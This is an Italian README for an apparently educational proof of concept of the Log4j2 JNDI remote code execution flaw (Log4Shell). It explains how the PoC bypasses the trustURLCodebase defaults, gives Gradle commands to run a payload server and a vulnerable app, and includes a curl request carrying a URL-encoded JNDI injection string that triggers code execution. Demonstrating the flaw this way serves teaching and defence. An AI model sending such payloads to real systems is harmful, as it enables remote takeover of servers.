
Un proof-of-concept minimale per la vulnerabilità RCE JNDI di Log4j2 (CVE-2021-44228/Log4Shell).
Un proof-of-concept minimale per la vulnerabilità di Remote-Code-Execution JNDI di Log4j2 (CVE-2021-44228). È pensato a scopo educativo per aiutare chi non è un ricercatore di sicurezza a capire come funziona e quanto sia grande l'impatto.
Il POC aggira il requisito di impostare le proprietà com.sun.jndi.rmi.object.trustURLCodebase
e com.sun.jndi.cosnaming.object.trustURLCodebase a true
che sono state disabilitate per impostazione predefinita a partire da 8u121, 7u131, 6u141
.
Nota: JDK 1.8 è necessario per compilare payload-server, ma victim-app è vulnerabile fino a JDK 15
perché il motore Nashorn è stato rimosso in JDK 15.
payload-server eseguendo:$ ./gradlew runPayloadServer
victim-app:$ ./gradlew runVictimApp
curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D per attivare la RCE.victim-app. Dovresti vedere un log inatteso
stampato sullo schermo.